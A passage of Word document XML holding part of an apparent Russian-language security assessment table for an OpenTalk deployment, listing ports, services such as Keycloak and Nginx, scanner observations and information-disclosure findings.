                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>accounts.opentalk</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.local","</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LiveKit</w:t>
            </w:r>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.opentalk.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>","</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>controller.opentalk</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.local</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"]</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1F13801E" w14:textId="0455213D" w:rsidR="00CE1680" w:rsidRPr="001211A6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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BD04" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Раскрытие структуры ПО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0C2F" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:t>Раскрытие внутренней архитектуры через сертификат</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00890BE6" w14:paraId="74D05646" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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3444" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00890BE6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121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80578" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>443/TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3426B498" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w: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B098E" w14:textId="64D38809" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="001F04CB" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121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Keycloak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65E5" w14:textId="1CECD48E" w:rsidR="001211A6" w:rsidRPr="00C54DEE" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00890BE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00890BE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00890BE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE1680" w:rsidRPr="00890BE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-config] [http] [info] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040600B5" w14:textId="075BD714" w:rsidR="001211A6" w:rsidRPr="00C54DEE" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00C804D5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText>HYPERLINK "https://accounts.opentalk.local/auth/realms/master/.well-known/openid-configuration"</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>accounts</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realms</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>master</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>well</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>known</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openid</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00C7285F">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>configuration</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="001211A6" w:rsidRPr="00C54DEE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6956C3D9" w14:textId="4EBDF008" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="001211A6" w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>scopes</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>supported</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>":[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>openid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acr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phone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email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microprofile</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>jwt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address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basic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web</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>origins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service</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>account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organization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offline</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>access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profile</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>","</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>roles</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"]</w:t>
            </w:r>
            <w:r w:rsidR="001211A6" w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="12DA5A5D" w14:textId="40A454C4" w:rsidR="00CE1680" w:rsidRPr="001211A6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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6A17" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00890BE6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Косвенная, версия 25 и выше. Раскрытие внутренней структуры ПО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7D910" w14:textId="624C0073" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Сканер </w:t>
            </w:r>
            <w:r w:rsidR="006B5B72">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>uclei</w:t>
            </w:r>
            <w:r w:rsidRPr="00890BE6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">при обращении </w:t>
            </w:r>
            <w:r w:rsidRPr="00890BE6">
              <w:t>выявил</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> признаки контейнера </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F04CB">
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, более точная версия определяется по признакам </w:t>
            </w:r>
            <w:r w:rsidRPr="00D03BDB">
              <w:t>OIDC</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">-метаданных, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494EF315" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00E01062" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00E01062">
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>organization</w:t>
            </w:r>
            <w:r w:rsidRPr="00E01062">
              <w:t xml:space="preserve"> ”</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E01062">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>появилась только в версиях 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00CE1680" w14:paraId="6E8A0A0E" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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BFFA" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00E01062" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>4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C01A" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>443/TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421D56AC" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w: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EB48" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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50F7" w14:textId="77777777" w:rsidR="001211A6" w:rsidRPr="00C54DEE" w:rsidRDefault="001211A6" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00C804D5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText>HYPERLINK "https://controller.opentalk.local/v1/users/me"</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>https</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>controller</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>opentalk</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>v</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1/</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="009B1ADB">
              <w:rPr>
                <w:rStyle w:val="af1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>me</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18619C17" w14:textId="16CA7B7E" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="001211A6" w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1680">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>сертификат</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1680"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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>controller.opentalk</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BF5EB3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidR="001211A6" w:rsidRPr="001211A6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="71593173" w14:textId="73ADD8CD" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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AF235" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Т</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1680">
              <w:t xml:space="preserve">очная версия сборки </w:t>
            </w:r>
            <w:r>
              <w:t>не раскрывается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A7E3F" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE1680" w:rsidRPr="00CE1680" w14:paraId="5D65D727" w14:textId="77777777" w:rsidTr="001211A6">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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0ACC1" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>5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030B8" w14:textId="77777777" w:rsidR="00CE1680" w:rsidRPr="00BF5EB3" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE1680">
              <w:t>80/TCP, HTTP</w:t>
            </w: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DD0F" w14:textId="18733A5F" w:rsidR="00CE1680" w:rsidRDefault="003A5828" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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952A" w14:textId="34252A10" w:rsidR="001211A6" w:rsidRPr="001211A6" w:rsidRDefault="00697D2C" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r w:rsidRPr="00697D2C">
              <w:t xml:space="preserve">Порт в состоянии </w:t>
            </w:r>
            <w:r w:rsidR="003E531F" w:rsidRPr="00495F80">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00697D2C">
              <w:t>filtered</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003E531F" w:rsidRPr="00495F80">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00697D2C">
              <w:t xml:space="preserve"> при сканировании</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70625699" w14:textId="1C683CD0" w:rsidR="00CE1680" w:rsidRPr="00697D2C" w:rsidRDefault="00CE1680" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pP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116BC" w14:textId="5341627E" w:rsidR="00CE1680" w:rsidRDefault="00697D2C" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>-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D42E" w14:textId="0D23E1AD" w:rsidR="00697D2C" w:rsidRDefault="00697D2C" w:rsidP="004B22D3">
            <w:pPr>
              <w:pStyle w:val="1121"/>
            </w:pPr>
            <w:r>
              <w:t>Порт по неизвестным ошибкам не отвечает</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48AD33C2" w14:textId="77777777" w:rsidR="000F2390" w:rsidRDefault="000F2390" w:rsidP="000F2390">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:sectPr w:rsidR="000F2390" w:rsidSect="00CE1680">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape" w:code="9"/>
          <w:pgMar w:top="1701" w:right="1134" w:bottom="851" w:left="851" w:header="567" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8DEC3F" w14:textId="77777777" w:rsidR="000F2390" w:rsidRPr="000F2390" w:rsidRDefault="000F2390" w:rsidP="000F2390">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
